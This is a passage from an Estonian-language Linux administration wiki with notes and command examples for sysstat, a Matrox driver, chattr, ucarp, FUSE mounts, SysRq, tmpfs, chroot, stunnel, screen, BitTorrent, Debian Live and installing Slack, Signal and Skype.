kernel -ro,soft,intr 192.168.10.249:/data/export

===Süsteemi ressursikasutuse jälgimine===

Pakett sysstat http://pagesperso-orange.fr/sebastien.godard/ sisaldab süsteemi ressurssikasutuse jälgimiseks vajalikke vahendeid, nii reaalajas kui taustal andmete kogumiseks

* reaalajas - iostat, pidstat, mpstat
* taustal - sa1, sa2, sar

Tarkvara käivitamist ja töötamist juhivad seadistusfailid

/etc/cron.d/sysstat
/etc/cron.daily/sysstat
/etc/default/sysstat

Taustal töötava sysstat töö tulemusena kogutakse andmed ja salvestatakse binaarses formaadis kataloogi /var/log/sysstat. Kogutud andmeid saab esitada nt selliselt

# sar -A -f /var/log/sysstat/sa22 | less

Eraldi mainimist vajab programm pidstat, mille abil saab jälgida üksiku protsessiga seotud ressursikasutust, nt plokkseadme IO'd

$ pidstat -d -p 15585 2
Linux 2.6.26-1-xen-amd64 (moraal.auul) 04/22/09 _x86_64_

20:13:28 PID kB_rd/s kB_wr/s kB_ccwr/s Command
20:13:30 15585 0.00 236.82 0.00 wget
20:13:32 15585 0.00 238.00 0.00 wget
20:13:34 15585 0.00 236.82 0.00 wget
20:13:36 15585 0.00 238.00 0.00 wget

Kõigi kasutaja postgres protsesside io'd saab uurida nt selliselt

$ pidstat -d -p ALL 2 | grep postgres

===Matrox P690 videokaardi kasutamine===

Matrox http://www.matrox.com/ valmistab suhteliselt eeskujulikke videokaarte. P690 mudeli kasutamiseks sobib kasutada aadressil http://www.matrox.com/graphics/en/products/graphics_cards/p_series/p690pci/ kopeeritud draiverit. Lisaks asub nö community-forum aadressil http://forum.tuxx-home.at/ ning sealsed entusiastid avaldavad oma parandustega draivereid.

====Paigaldamine====

# CC=/usr/bin/gcc-4.1 sh mtxdriver-installer-x86_32-cvs-20090511.run
..
Please, enter the directory to extract the files [/root/] /usr/src/mtx
Creating directory /usr/src/mtx/matroxdriver-x86_32-cvs-20090511
Verifying archive integrity... All good.
Uncompressing Matrox Parhelia Driver.
..
========================================
Matrox Linux Driver Install Script
========================================

Installation package v1.4.7

Refreshing ld database
Installing mtx_drv.so ...
Installing v4l_drv.so ...
Messages are being logged in file /tmp/make.log,
this might take some time.

Compiling mtx.ko ... done

Installing mtx.ko ...
Backing up libGL
Installing 32bits OpenGL library file to /usr/lib
Installing libGL.so.1.3.0 ...
Installing the GLX library file to /usr/lib/xorg/modules/extensions

Installing libglx.so ...
Installing the gl.h header file to /usr/include/GL

Installing gl.h ...
Installing the glext.h header file to /usr/include/GL

Installing glext.h ...
Installing the glx.h header file to /usr/include/GL

Installing glx.h ...
Updating library cache

Installing documentation

cp: cannot stat `v4l': No such file or directory
Installing powerdesk

Installing mtxcards ...
Installing mtxwizard ...
Installing matroxconfig ...
Installing libmtxcfg.so ...

Do you wish to let the installer setup your X config file (y/n)? y

Trying to configure your X config file (/etc/X11/xorg.conf)

Installation finished

Tulemusena on

* moodustatud nö vaikimisi /etc/X11/xorg.conf seadistusfail
* seadistusutiliit /usr/bin/matroxconfig
* kataloogi /usr/share/matrox on paigutatud teeke ja tekste
* kompileeritud ja paigaldatud tuuma moodul mtx.ko, mis on link /usr/share/matrox kataloogi failile

# find /lib/modules/2.6.26-2-686 -name mtx.ko -ls
721274 0 lrwxrwxrwx 1 root root 32 Aug 8 17:44 \
/lib/modules/2.6.26-2-686/kernel/drivers/video/mtx.ko -> /usr/share/matrox/current/mtx.ko

Süsteemi on lisatud/asendatud sellised failid

/usr/bin
/usr/bin/mtxwizard
/usr/bin/matroxconfig
/usr/share
/usr/share/mtxwizard
/usr/share/mtxwizard/mtxcards
/usr/share/matrox
/usr/share/matrox/samples
/usr/share/matrox/samples/XF86Config.QID_Quad_Hybrid
/usr/share/matrox/samples/XF86Config.QID_Quad_Merge
/usr/share/matrox/samples/XF86Config.triple
/usr/share/matrox/samples/XF86Config.QID_Triple_Hybrid_1
/usr/share/matrox/samples/XF86Config.T221-Merged
/usr/share/matrox/samples/XF86Config.merged
/usr/share/matrox/samples/XF86Config.dual
/usr/share/matrox/samples/XF86Config.QID_Triple_Hybrid_2
/usr/share/matrox/samples/XF86Config.single
/usr/share/matrox/samples/XF86Config.triple_merged
/usr/share/matrox/samples/XF86Config.T221-Xinerama
/usr/share/matrox/current
/usr/share/matrox/current/gl.h
/usr/share/matrox/current/libmtxcfg.so
/usr/share/matrox/current/mtxcards
/usr/share/matrox/current/mtx_drv.so
/usr/share/matrox/current/glx.h
/usr/share/matrox/current/glext.h
/usr/share/matrox/current/mtx.ko
/usr/share/matrox/current/v4l_drv.so
/usr/share/matrox/current/mtxwizard
/usr/share/matrox/current/libGL.so.1.3.0
/usr/share/matrox/current/matroxconfig
/usr/share/matrox/current/libglx.so
/usr/share/matrox/backup
/usr/share/matrox/docs
/usr/share/matrox/docs/readme.txt
/usr/share/matrox/docs/readme-advanced.txt
/usr/lib
/usr/lib/libGL.so.1.3.0
/usr/lib/libGL.so
/usr/lib/xorg/modules/extensions
/usr/lib/xorg/modules/extensions/libmtxcfg.so
/usr/lib/xorg/modules/extensions/libglx.so
/usr/lib/xorg/modules/drivers
/usr/lib/xorg/modules/drivers/mtx_drv.so
/usr/lib/xorg/modules/drivers/v4l_drv.so
/usr/lib/libGL.so.1
/usr/src/mtx
/usr/src/mtx/log
/usr/include/GL
/usr/include/GL/gl.h
/usr/include/GL/glx.h
/usr/include/GL/glext.h

Tuuma laadimisel öeldakse

# modprobe mtx
mtx: module license 'Copyright (c) 2002, 2004, Matrox Graphics Inc.' taints kernel.
[mtx] MTX driver v1.4.7
[mtx] Allocated a MTX agp driver structure
ACPI: PCI Interrupt 0000:03:00.0[A] -> GSI 21 (level, low) -> IRQ 21
[mtx] 0x2539(sub:0xffffffff) board found at 03:00.0

====Seadistamine====

Komplekt sisaldab ka graafilist haldusutiliiti matroxconfig, mille abil saab genereerida sobiva X serveri seadistusfaili /etc/X11/xorg.conf, nt sellise [[Pilt:Xorg.conf.patch]]

[[Pilt:Matroxconfig-1.gif]]

Käivitamisel öeldakse dmesg'i

[mtx] Registers at 0xe8000000, size: 8K, flags: 131588, knl_addr: 0xf8bb8000
[mtx] Framebuffer at 0xe0000000, size: 128M, flags: 135692, knl_addr: 0x00000000, write-combining: YES
[mtx] Busmastering flags:
[mtx] Board type detected: PCI
[mtx] Chipset 0x2539:0x102b was detected
[mtx] AGP chipset was detected
[mtx] PCI transfers available for read write
[mtx] Parhelia patches applied: PowerM Cap66Mhz CompBypass
[mtx] Registers at 0xe8000000, size: 8K, flags: 131588, knl_addr: 0xf8bb8000
[mtx] Framebuffer at 0xe0000000, size: 128M, flags: 135692, knl_addr: 0x00000000, write-combining: YES
[mtx] Busmastering flags:
[mtx] Board type detected: PCI
[mtx] Chipset 0x2539:0x102b was detected
[mtx] AGP chipset was detected
[mtx] PCI transfers available for read write
[mtx] Parhelia patches applied: PowerM Cap66Mhz CompBypass

X log võiks olla nt selline http://kuutorvaja.eenet.ee/mw-1.9.3/images/e/e1/Xorg.mtx-p690.patch

Kui töökohaarvuti vahetada säilitades videokaardi ja monitorid, siis tõenäoliselt piisab xorg.conf failis asendada seadme sektsioonides PCI BusID väärtus sobivaga

Section "Device"
# generated by mtx wizard
Identifier "mtxwizard_device_1"
Driver "mtx"
BusID "PCI:3:0:0"
Screen 1
EndSection

kusjuures õige saab teha kindlaks lspci utiliidiga

# lspci | grep Matrox
03:00.0 VGA compatible controller: Matrox Graphics, Inc. Millennium P690 (rev 01)

===lsattr ja chattr programmide kasutamine===

chattr programmi abil saab ext2 ja ext3 failisüsteemis seadistada failidele täiendavad omadusi. Näiteks, märkida faili immutable'ks

# chattr +i failinimi

Tulemusena ei saa seda faili ka kustutada juurkasutaja

# rm failinimi
rm: cannot remove `failinimi': Operation not permitted

Atribuutide väärtusi saab küsida öeldes

# lsattr failinimi
----i-------------- failinimi

immutable biti saab eemaldada öeldes

# chattr -i failinimi

===ucarp kasutamine===

ucarp http://www.ucarp.org/project/ucarp tarkvara abil on võimalik korraldada kahe või enama arvuti nn aktiivset/passiiveset klustrit kasutades CARP protokolli. Klustri igal arvutil on oma individuaalne ip aadress ning lisaks on määratud üks teenuse virtuaalne ip aadress. Sõltuvalt sellest, kuidas parasjagu on klustri osalesid masteri osas kokku leppinud pakub master teenust, teised on nö kõrval-seisvas (ingl. k. standby) asendis.

Tarkvara paigaldamiseks tuleb öelda

# apt-get install ucarp

Ning seadistamiseks tuleb nt kahe komponendilise klustri ühe arvuti võrguliideste seadistusfailis /etc/network/interfaces kasutada

auto eth0
iface eth0 inet static
address 192.168.10.51
gateway 192.168.10.254
netmask 255.255.255.0

ucarp-vid 3
ucarp-vip 192.168.10.48
ucarp-password test1234
ucarp-advskew 0
ucarp-advbase 1
ucarp-master yes

iface eth0:ucarp inet static
address 192.168.10.48
netmask 255.255.255.255

ning teise arvuti puhul

auto eth0
iface eth0 inet static
address 192.168.10.52
gateway 192.168.10.254
netmask 255.255.255.0

ucarp-vid 3
ucarp-vip 192.168.10.48
ucarp-password test1234
ucarp-advskew 10
ucarp-advbase 1
ucarp-master yes

iface eth0:ucarp inet static
address 192.168.10.48
netmask 255.255.255.255

Tulemusena on kokkulepitud masteris lisaks tavalistele vürguseadetele seade eth0:ucarp

eth0:ucarp Link encap:Ethernet HWaddr 70:01:68:01:00:51
inet addr:192.168.10.48 Bcast:192.168.10.255 Mask:255.255.255.255
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

ucarp on võrreldes keepalived või heartbeat tarkvaraga tagasihoidlikemate omadustega, kuid mõnel juhul võib just see ollagi eeliseks.

===FUSE===

Kui tavaliselt toimub failisüsteemidega tegelemine, nt külgeühendamine, privilegeeritud kasujana ning nn kernel-space'is, siis FUSE (Filesystem in Userspace) http://fuse.sourceforge.net/ tehnika võimaldab seda teha tavakasutajana user-space'is. Linuxi tuum sisaldab FUSE tuge ning paketihalduses on rohkesti FUSE funktsionaalsust kasutavat tarkvara. Üldkasutatavad FUSE utiliidid on paketis fuse-utils.

====curlftpfs====

curlftpfs abil saab nö külge monteerida ftp serverist ressurssi, tarkvara paigaldamiseks tuleb öelda

# apt-get install curlftpfs

Kasutmise peab kasutaja kuuluma gruppi fuse, ressursi külgeühendamine toimub öeldes

$ curlftpfs ftp://ftp.ee.debian.ee /tmp/ftp.ee.debian.org

ja lahtiühendamiseks

$ fusermount -u /tmp/ftp.ee.debian.org

Kasutamine toimub nii nagu tavalise kohaliku failisüsteemi kasutamine.

====SSHFS====

sshfs abil saab nö külge monteerida serverist, kuhu on ssh ligipääs, ressurssi, tarkvara paigaldamiseks tuleb öelda

# apt-get install sshfs

Kasutamise peab kuuluma gruppi fuse, külgeühendamiseks sobib öelda

$ sshfs mart@loomaaed.tartu.ee:/katalooginimi-ssh-serveris /katalooginimi-kohalikus-arvutis

Lahtiühendamiseks

$ fusermount -u /katalooginimi-kohalikus-arvutis

===SysRq===

Kui Linuxi tuum hangub, siis enamikul juhtudel on ta võimeline aru saama talle nö otse saadetud signaalidest. Lenny paketihalduse tuumaga saab vaikimisi SysRq'd kasutada, väljalülitamiseks tuleb parameetrile kernel.sysrq omistada väärtus null

# sysctl -w kernel.sysrq=0

* http://en.wikipedia.org/wiki/Magic_SysRq_key

====Füüsiliselt konsoolilt====

Füüsiliselt konsoolilt saab sisestada erinevaid kombinatsioone (kui SysRq klahv pole tähistatud, siis tavaliselt toimib sellena PrintScreen)

# failisüsteemide sünkroniseerimine - Alt-SysRq-s
# failisüsteemide read-only remountimine - Alt-SysRq-u
# arvuti reboot - Alt-SysRq-b

Iga tegevuse kohta antakse terminalile ka vastav teade.

====Käsurealt====

Kui aga arvutis ollakse eemal ning mingil põhjusel on siiski võimalik talle käske anda, kuigi ta käitub piisavalt juhtimatult, et selleks ettenähtud vahenditega rebooti teha, nt 'shutdown -r now', siis saab samasid tegevusi esile kutsuda selliselt

bash# echo s > /proc/sysrq-trigger
bash# echo u > /proc/sysrq-trigger
bash# echo b > /proc/sysrq-trigger

Ammendav loetelu võimalikest sisenditest on kirjas tuuma lähtetekstide kataloogis vist failis Documentation/kernel-parameters.txt.

====Xen konsoolilt====

Xeni konsoolilt saab saata SysRq signaale valides

Ctrl+O ja täht

h väljastab nimekirja toetatud signaalidest

SysRq : HELP : loglevel0-8 reBoot tErm Full kIll saK aLlcpus\
showMem Nice powerOff showPc show-all-timers(Q) unRaw Sync showTasks \
Unmount shoW-blocked-tasks

====Serial konsoolilt====

Serial konsoolilt saab tuumale SysRq signaali saata valides Break + täht.

===RAM failisüsteemid===

RAM failisüsteem võimaldab kasutada arvuti virtuaalmälu st RAM + swap ressursse failisüsteemina, nt sellised tehnikad

* tmpfs - tundub, et 2016 aasta seisuga on see üldiselt soovitatav ram failisüsteem, mõnes kohas kirjandus väidab, et tmpfs ei võimalda failisüsteemi suurust piirata, paistab, et see siiski ei ole nii
* ramfs - legacy ramfs, 2016 aasta seisuga üldiselt ei soovitata kasutada

====tmpfs====

tmpfs võimaldab kasutada arvuti virtuaalmälu st RAM + swap ressursse failisüsteemina. Kasutamine toimub selliselt

# mkdir /mnt/tmpfs
# mount -t tmpfs -o size=48g tmpfs /mnt/tmpfs

Kuna failisüsteem asub mälus, siis ta töötab kiiresti

# dd if=/dev/zero of=/mnt/tmpfs/1G bs=1M count=1024
1024+0 records in
1024+0 records out
1073741824 bytes (1.1 GB) copied, 0.981817 s, 1.1 GB/s

Traditsiooniline tmpfs ühenduspunkt tmpfs jaoks on /dev/shm mis on ka vaikimisi Debian Lenny puhul kasutuses

# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/system-root 4.0G 3.6G 236M 94% /
tmpfs 3.9G 0 3.9G 0% /lib/init/rw
udev 10M 60K 10M 1% /dev
tmpfs 3.9G 4.0K 3.9G 1% /dev/shm
/dev/sda1 107M 82M 20M 81% /boot

Süsteemi poolt vaikimisi kasutatavate tmpfs failisüsteemides on nt selline sisu

# find /dev/shm -ls
5812 0 drwxrwxrwt 3 root root 60 Jul 19 08:25 /dev/shm/
5964 0 drwxr-xr-x 2 root root 60 Jul 19 08:25 /dev/shm/network
6019 4 -rw-r--r-- 1 root root 16 Jul 19 08:25 /dev/shm/network/ifstate

ja

# find /lib/init/rw
/lib/init/rw
/lib/init/rw/sendsigs.omit.d
/lib/init/rw/sendsigs.omit.d/portmap
/lib/init/rw/.ramfs

Lisaks on /dev failisüsteem udev kasutamisel tmpfs peal, üldiselt sobib konkreetse süsteemi puhul küsida

# mount | grep tmpfs

====ramfs====

# mkdir /mnt/ramfs
# mount -t ramfs -o size=200m ramfs /mnt/ramfs

====Kasulikud lisamaterjalid====

* https://www.jamescoyle.net/knowledge/951-the-difference-between-a-tmpfs-and-ramfs-ram-disk

===makejail abil chroot keskkonna moodustamine===

Makejail programm abil saab moodustada chroot keskkonda, paigaldamiseks sobib öelda

# apt-get install makejail

Programmi tööd juhib seadistusfail, nt /root/makejail-bash.py, kus on antud juhul näidatud

* kuhu kataloogi moodustada chroot keskkond
* lisada sinna /bin/bash shell ning vastavad teegid lisada (antud juhul kasutatakse AMD64 platvormi)

# cat /root/makejail-bash.py
chroot="/home/mart"
forceCopy=["/lib64/ld-linux-x86-64.so.2", "/bin/bash","/lib/ld-linux-x86-64.so.2"]

moodustame kataloogi /home/mart

bash# mkdir /home/mart

ning moodustame sinna alla chroot keskkonna

bash# makejail /root/makejail-bash.py
Loading configuration file /root/makejail.py
Defining chroot = '/home/mart'
Defining forceCopy = ['/bin/bash']
Chroot directory is /home/mart
Initializing list of running processes
Executing : ps -e
Creating temp dir /tmp/makejail_logs
Adding files matching '/bin/bash'
Checking path '/bin/bash'
Dir '/home/mart/bin' missing
Checking path '/bin'
Making dir /home/mart/bin
..
Creating 'lib/libncurses.so.5' as a symlink to 'libncurses.so.5.5' (pwd=/home/mart/lib)
Executing : file /lib/libncurses.so.5
Sleeping for 2.00 seconds

Tulemusena tekib selline failistruktuur

bash# cd /home
bash# find mart -ls
507962 4 drwxr-xr-x 4 root root 4096 Sep 9 15:12 mart
507963 4 drwxr-xr-x 2 root root 4096 Sep 9 15:12 mart/lib
507968 1260 -rwxr-xr-x 1 root root 1286104 May 15 13:19 mart/lib/libc-2.3.6.so
507972 0 lrwxrwxrwx 1 root root 17 Sep 9 15:12 mart/lib/libncurses.so.5 -> libncurses.so.5.5
507973 100 -rwxr-xr-x 1 root root 97928 May 15 13:19 mart/lib/ld-2.3.6.so
507967 368 -rw-r--r-- 1 root root 369728 Oct 19 2006 mart/lib/libncurses.so.5.5
507974 0 lrwxrwxrwx 1 root root 11 Sep 9 15:12 mart/lib/ld-linux-x86-64.so.2 -> ld-2.3.6.so
507970 12 -rw-r--r-- 1 root root 10392 May 15 13:19 mart/lib/libdl-2.3.6.so
507971 0 lrwxrwxrwx 1 root root 14 Sep 9 15:12 mart/lib/libdl.so.2 -> libdl-2.3.6.so
507969 0 lrwxrwxrwx 1 root root 13 Sep 9 15:12 mart/lib/libc.so.6 -> libc-2.3.6.so
507964 0 lrwxrwxrwx 1 root root 4 Sep 9 15:12 mart/lib64 -> /lib
507965 4 drwxr-xr-x 2 root root 4096 Sep 9 15:12 mart/bin
507966 756 -rwxr-xr-x 1 root root 769368 Dec 11 2006 mart/bin/bash

Selleks, et veenduda kas kasutaja chroot keskkonna tekitamine õnnestus tuleb öelda, mille vastuseks saab shelli (ja siis öelda exit)

bash# chroot /home/mart
bash#

Nt sobib makejaili kasutada OpenSSH kasutajate chrootimisel.

Seda, kas protsess töötab chroot keskkonnas saab kontrollida nt küsides vastava pid kohta, kuis link on mitte / kataloogile, siis on protsess näidatud kataloogi chroot'itud

# ls -ld /proc/11091/root
lrwxrwxrwx 1 root root 0 Feb 2 22:39 /proc/11091/root -> /home/mart

===Peale crashi Debiani käima-aitamine===

Kui Debiani süsteem on crashinud, nt voolu kadumise tõttu, siis enamasti ext3 failisüsteem korrigeerib ennast ise, aga mõned rakendused on segaduses.

====Skype====

Skype teatab vahel, et 'Another Skype instance may exist', sel puhul ei pruugi aitada lock failide eemaldamine

$ rm .Skype/shared.lck .Skype/martkask/config.lck

aga võib aitada selline järgnevus

* käivitada Skype -dhpath võtmega ja logida korra sisse ning sulgeda programm (Quit), st nii, et protsess skype kaob

$ skype --dbpath=/home/mart/skype-tmp

* selleks, et chat history jms säiliks, kopeerida vana sisuga üle kontole vastava kastaloogi sisu

$ rsync -avH /home/mart/.Skype/martkask/ /home/mart/skype-tmp/martkask
$ mv /home/mart/.Skype /home/mart/.Skype-20090811-mittetootav
$ mv /home/mart/skype-tmp /home/mart/.Skype

* katsuda kasutada Skype'i edasi tavapärasel moel

====Icedove====

Programm ütleb käivitamisel, et '...', aitab kustutada failid

$ rm /home/mart/.mozilla-thunderbird/r4t56nog.default/.parentlock
$ rm /home/mart/.mozilla-thunderbird/r4t56nog.default/lock

ja proovida tavalisel moel edasi kasutada. Kontod jms seadistused peaksid nõnda säilima.

====Iceweasel====

Kui Iceweaseli kataloog .mozilla on ühendatud üle NFS'i siis on peale süsteemi crashi Iceweasel üsna katki. St *\lock\* failide eemaldamine näib mitte aitavat jne, väidetavalt on asi NFS ja Iceweaseli koostöös, tundub, et aitab korra .mozilla kataloog kokku ja lahti pakkida

$ tar cf .mozilla.tar .mozilla
$ rm -rf .mozilla
$ tar xf .morilla.tar
$ rm .mozilla.tar

===Stunnel4 kasutamine===

Stunnel http://www.stunnel.org/ tarkvara võimaldab ühendada kokku krüptimist iseenesest mitte toetavat klienti ja krüptitud teenust, või vastupidi. Või korraldada krüptimist mitte toetava kliendi ja serveri vahel siiski krüptitud andmevahetust.

Paigaldamiseks tuleb öelda

# apt-get install stunnel4

====Stunnel4 kliendi kasutamine krüptitud teenuse poole pöördumisel====

Seadistusfaili /etc/stunnel/stunnel.conf sobib kirjutada

sslVersion = SSLv3
chroot = /var/lib/stunnel4/
setuid = stunnel4
setgid = stunnel4
pid = /stunnel4.pid

socket = l:TCP_NODELAY=1
socket = r:TCP_NODELAY=1

output = /var/log/stunnel4/stunnel.log

client = yes

[smtps]
accept = 127.0.0.1:46525
connect = smtps.loomaaed.tartu.ee:465

tulemusena saab pöörduda smtp kliendiga krüptimata localhost:46525 porti, mida vahendatakse smtps.loomaaed.tartu.ee 465 krüptitud pordiga.

===Terminalihaldusprogrammi Screen kasutamine===

screen tarkvara peab olema paigaldatud kaughallatavasse arvutisse

# apt-get install screen

* screen käivitamiseks logida eemal olevasse arvutisse sisse ja öelda

$ screen

* Ctrl-a, c - tekita uus aken
* Ctrl-a, n - liigu järgmisse aknasse
* Ctrl-a, d - lase screenist lahti
* esita nimekiri arvutis olevatest kasutaja screenidest

$ screen -ls
There is a screen on:
2807.pts-5.pg2a (Detached)
1 Socket in /var/run/screen/S-postgres.

* ühendu näidatud screeniga

$ screen -r 2807.pts-5.pg2a

Süsteemis töötavate screenidele vastavaid protsesse näeb öeldes

# ps aux | grep SCREEN

Mitmekasutajarežiimis screen kasutamiseks saavad järgmised kasutajad ühenduda külge öeldes

$ screen -x

Screen logimiseks on -L võti, logi kirjutatakse faili screenlogN.log, või ^a-H.

Kui screen on attached olekus, aga vastav terminaliaken on nö kadunud, siis resumemiseks tuleb enne force'ida detach

$ screen -D

===IEEE 802.1X kasutamine===

TODO

* http://en.wikipedia.org/wiki/IEEE_802.1X
* http://www.cesnet.cz/doc/techzpravy/2007/802.1x-wired-authentication/

===Bittorrent===

Bittorrent on levinud P2P (peer-to-peer, ingl. k. osaliselt-osalisele) andmevahetusprotokoll, millele on iseloomulik, et suhtlemine leiab olulises osas aset otse osaliste endi vahel. Andmevahetusprotokoll on orienteeritud pigem suuremamahulisema andmevahetuse jaoks ning kopeeritud andmeid reeglina ei saa kasutada nö reaalajas kopeerimise käigus, vaid peale kopeerimise lõppu sobiva rakendusega. Nt kui tegu on video-materjaliga, siis saab seda videot asuda vaatama peale kopeerimise lõppu, mitte aga kopeerimise ajal.

====Bittorrenti kliendi kasutamine andmete kopeerimiseks====

Andmete kopeerimiseks võrgust kohalikku arvutisse on vaja teada huvipakkuva ressursi nö aadressi, mis esineb .torrent faili kujul. Nt jagatakse aadressilt http://www.debian.org/CD/torrent-cd/ edasi liikudes Debian operatsioonisüsteemi .torrent faile

http://cdimage.debian.org/debian-cd/5.0.3/amd64/bt-cd/debian-503-amd64-CD-1.iso.torrent

Debian Linux sisaldab mitmeid bittorrent kliente (nt rtorrent, qbittorrent, bittorrent, bittornado jt), mis võivad erineda kõigi või mõne aspekti poolest järgnevatest

* millises mahus on bittorrent protokoll toetatud
* kas programmil on graafiline, pseudo-graafiline (nn curses) või käsurea kasutajaliides

Konkreetselt qbittorrent kasutajaliides näeb välja nt selline

[[Pilt:bittorrent-1.gif]]

kust on näha

* kopeeritakse faili debian-503-amd64-CD-1.iso
* DL Speed on allalaadimise kiirus ja UP Speed üleslaadimise kiirus
* Seeds/Leechs näitab kui paljudelt osalistelt kasutaja kopeerib ja kui paljud temalt edasi kopeerivad
* sakil Search saab vaikimisi qbittorrenti klienti seadistatud trackereid kasutada otsinguks ja otsingu tulemustena leitud .torrenteid kopeerida

Kopeerimise alustamiseks tuleb valida nupp BT ning kopeerida sinna .torrent faili aadress, nt

http://cdimage.debian.org/debian-cd/5.0.3/amd64/bt-cd/debian-503-amd64-CD-1.iso.torrent

====Bittorrent kliendi kasutamine andmete jagamiseks====

Bittorrentiga on algajal kasutajal oluliselt lihtsam kopeerida andmeid endale kui pakkuda välja oma andmeid teistele kasutajatele.

.torrenti moodustamiseks sobib öelda (programmid on paketist bittorrent) eeldusel, et on olemas fail andmed.iso

$ btmakemetafile.bittorrent andmed.iso http://torrent.loomaaed.tartu.ee:80/announce

kus

* andmed.iso - lähtematerjal, mida asutakse välja jagama
* http://torrent.loomaaed.tartu.ee:80/announce - trackeri aadress

Käsu tulemusena moodustatakse vastav .torrent fail

andmed.iso.torrent

ning seejärel saab seda välja jagada nt nii

$ btdownloadcurses.bittorrent andmed.iso.torrent

====Kohaliku trackeri kasutamine====

bittorrent pakett sisaldab bittorrent tracker programmi bttrack. Trackeri käivitamiseks sobib öelda lihtsamal juhul

# bttrack --dfile dfail.log

mille tulemusena käivitub pordil 80 spetsiaalne http server, mis on valmis võtma vastu bittorrent klientide poolt infot andmete väljajagamise kohta ja teenindama bittorrenti kliente, kes soovivad andmeid endale kopeerida.

Selliselt käivitatud trackerit saab kasutada nt organisatsiooni siseselt, iseasi kas sellisel kasutusel erilist praktilist väärtust on.

====Transmission====

Transmission tarkvaral on mitmed kasutajaliidesed, muu hulgas käsurealt kasutamise võimalus. Tarkvara paigaldamiseks sobib öelda

# apt-get install transmission-cli

Seejärel tuleb tekitada seadistusfail nt sellise sisuga ning moodustada näidatud kataloogid

$ cat ~/.config/transmission/settings.json
{
"download-dir": "/home/priit/transm",
"incomplete-dir": "/home/priit/transm-incomplete",
"incomplete-dir-enabled": true,
"open-dialog-dir": "/home/priit",
"recent-download-dir-1": "/home/priit/transm",
}

kusjuures esimesel käivitamisel kirjutab sinna programm paljude muude seadistusparameetrite vaikeväärtused lisaks juurde. Käivitamiseks sobib öelda nt

$ /usr/bin/transmission-cli /tmp/proxmox-ve_3.1-93bf03d4-8.iso.torrent

Tulemusena tekib fail

transm/proxmox-ve_3.1-93bf03d4-8.iso

===Amule===

TODO

===Debian Live===

Debian Live projekt http://debian-live.alioth.debian.org/ tegeleb selliste vahendite ettevalmistamisega, millega kasutaja saab moodustada oma vajaduste rahuldamiseks sobivaid operatsioonisüsteemi tõmmiseid. Live keskkonnale on iseloomulik, et operatsioonisüsteem laaditakse mingilt nö mitte-kõvakettalt, vaid nt CD/DVD plaadilt, USB pulgalt või võrgust ning et sellise keskkonna kasutamine ei mõjuta arvuti lokaalse kõvaketta olekut.

====live-helper====

Tarkvara paigaldamiseks sobib öelda

# apt-get install live-helper

Tarkvara kasutamist on kirjeldatud aadressil http://live.debian.net/manual/html/index.html.

Nt alglaadiva usb pulga tõmmise ettevalmistamiseks sobib kasutada

# mkdir /usr/src/live
# cd /usr/src/live
# ld_config
# ld_build -b usb-hdd

Tulemusena tekib fail binary.img mida saab kopeerida nt Windows Vista keskkonnas USB pulgale programmiga http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/.

Tulemuse katsetamiseks sobib qemu, sedasi

# qemu -hda binary.img

====live-magic====

Tarkvara paigaldamiseks sobib öelda

# apt-get install live-magic

Debian Live Magic programmi käivitamiseks tuleb öelda juurkasutajana

# live-magic

ning avaneb järgnev pilt

[[Pilt:Debian-live-1.gif]]

kus tuleb valida, millist Live keskkonda ettevalmistama asutakse.

===Slack kasutamine===

Slack https://slack.com/ paigaldamiseks sobib kopeerida .deb fail ning öelda

# apt-get install failinimi.deb

Paistab, et tarkvara paigaldamise käigus tekitatakse fail

# cat /mnt/kontdeb9/etc/apt/sources.list.d/slack.list
deb https://packagecloud.io/slacktechnologies/slack/debian/ jessie main

===Signal kasutamine===

Tarkvara kopeerimiseks https://signal.org/download/

<pre>
# cat /etc/apt/sources.list.d/signal-xenial.list
deb [arch=amd64] https://updates.signal.org/desktop/apt xenial main

# curl -s https://updates.signal.org/desktop/apt/keys.asc | sudo apt-key add -
</pre>

ja paigaldamiseks

<pre>
# apt-get update
# apt-get install signal-desktop
</pre>

===Skype kasutamine===

Aadressil http://www.skype.com/ jagatakse Skype tarkvara mitmel erineval kujul

* 32 bit
* 64 bit
* staatiliselt lingitud

====2017 - Skype v. 5.0 kasutamine====

Märkus: 2017 kevadel on v. 5.0 beta, mis praktiliselt tähendab, et muidu töötab, aga chat histori otsingut pole.

Lisada võti

# curl https://repo.skype.com/data/SKYPE-GPG-KEY | sudo apt-key add -

lisada fail /etc/apt/sources.list.d/skypeforlinux.list

# cat /etc/apt/sources.list.d/skypeforlinux.list
deb [arch=amd64] https://repo.skype.com/deb stable main

ja paigaldada

# apt-get update
# apt-get install skypeforlinux

Kasulikud lisamaterjalid

* https://www.ubuntuupdates.org/ppa/skypeforlinux

====pre 2017 - Skype kasutamine 64 bit keskkonnas====

Süsteemi etteavalmistamisel tuleb paigaldada paketid ia32-libs-gtk ja libqt4-dev

# apt-get install ia32-libs-gtk libqt4-dev

Seejärel skype 64 bit pakett, muus osas peaks töötama kuigi käivitamisel öeldakse

$ skype
Gtk-Message: Failed to load module "canberra-gtk-module": \
/usr/lib/gtk-2.0/modules/libcanberra-gtk-module.so: wrong ELF class: ELFCLASS64
(<unknown>:6901): Gtk-WARNING **: /usr/lib/gtk-2.0/2.10.0/engines/libglide.so:
wrong ELF class: ELFCLASS64

====Skype kasutamine Debian Wheezy multiarch keskkonnas====

* kopeerida Skype lokaalsesse reposse - http://www.auul.pri.ee/wiki/Operatsioonis%C3%BCsteemi_Debian_GNU/Linux_paketihalduse_kasutamine#Privaatse_failis.C3.BCsteemi_repositooriumi_kasutamine
* lisada süsteemile i386 arhitektuur - http://www.auul.pri.ee/wiki/Operatsioonis%C3%BCsteemi_Debian_GNU/Linux_kasutamine#Multiarch_kasutamine
* paigaldada skype

# apt-get install skype:i386

====Skype v. 8.x kasutamine====

Kui järgmine v. 8.y versioon ei sobi, siis saab eelmise x. 8.x paigaldada nt selliselt

# apt-get install skypeforlinux=8.11.0.4

Nimekiri variantidest on näha aadressil https://repo.skype.com/deb/pool/main/s/skypeforlinux/

====Skyperious====

